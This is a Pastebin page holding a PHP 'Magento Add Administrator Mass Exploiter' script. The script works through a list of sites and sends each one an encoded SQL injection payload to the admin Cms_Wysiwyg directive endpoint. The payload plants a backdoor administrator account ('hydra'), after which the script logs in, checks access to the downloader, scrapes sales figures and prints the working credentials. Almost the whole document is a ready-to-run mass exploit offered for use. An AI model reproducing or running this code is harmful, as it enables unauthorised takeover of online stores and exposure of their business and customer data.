API tools faq
paste
Keceabizs

Magento (Keceabizs)

Keceabizs
Nov 12th, 2016
57
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.83 KB | None | 0 0
raw download clone embed print report
  1. <?php error_reporting(0); set_time_limit(0); $banner = ' #-----------------------------------------------------------# # Magento Add Administrator Mass Exploiter V.3 # # Coded By Keceabizs # # Keceabizs Family # # http://facebook.com/KeceAbizs # # Http://Keceabizs.blogspot.com # #-----------------------------------------------------------# '; function bersihkan($htmltags) {    $htmltags = str_replace('<span class="price">','',$htmltags);   $htmltags = str_replace('</span>','',$htmltags);    return $htmltags;    } $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1"; $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77"; $postdwn = "username=hydra&password=hydra77"; $pageadm = "/admin/Cms_Wysiwyg/directive/index/"; $pagelog = "/admin/"; $pagedwn = "/downloader/"; function stupid_CURL($url,$data,$page) { $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $url.$page); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $data); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_POST, 1); $headers = array(); $headers[] = 'Content-Type: application/x-www-form-urlencoded'; curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt ($ch, CURLOPT_HEADER, 1); $result = curl_exec ($ch); curl_close($ch); return $result; } print $banner; $get=file_get_contents($argv[1]) or die(" \n\tError ! \n\tusage => php thisfile.php yourlist.txt\n\n"); $j=explode("\r\n",$get); foreach($j as $site){      print "\n\n\t=> Checking : ".$site; $hajar = stupid_CURL($site , $postadm, $pageadm); if(preg_match('#200 OK#', $hajar)) {     $expres = "Success";    $ceklog = stupid_CURL($site , $postlog, $pagelog);   if(preg_match('#302 Moved#', $ceklog)) {   preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match); foreach($match as $val) {  $ltm = $val[0]; $avo = $val[1];     break; }    $admlog = "Success";    $user = "hydra";    $pass = "hydra77";  $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);  if(preg_match('#Return to Admin#', $cekdwn)) {  $dwnlog = "Login Success"; }else {  $dwnlog = "Login Failed"; } }else {     $admlog = "Failed";     $user = "NULL";     $pass = "NULL"; } }else {   $admlog = "Failed";     $expres = "Failed";     $user = "NULL";     $pass = "NULL";     $dwnlog = "Login Failed";   $ltm = "NULL"; $avo = "NULL"; } echo '  +---------------------------------------------+     +-------Magento Add Admin Exploiter V.3-------+     +---------------------------------------------+     | Exploiting    : '.$expres.'   | Login Admin   : '.$admlog.'   | Lifetime Sales: '.bersihkan($ltm).'   | Average Order : '.bersihkan($avo).'   | Downloader    : '.$dwnlog.'   | Username  : '.$user.'     | Password  : '.$pass.'     +---------------------------------------------+ '; } ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!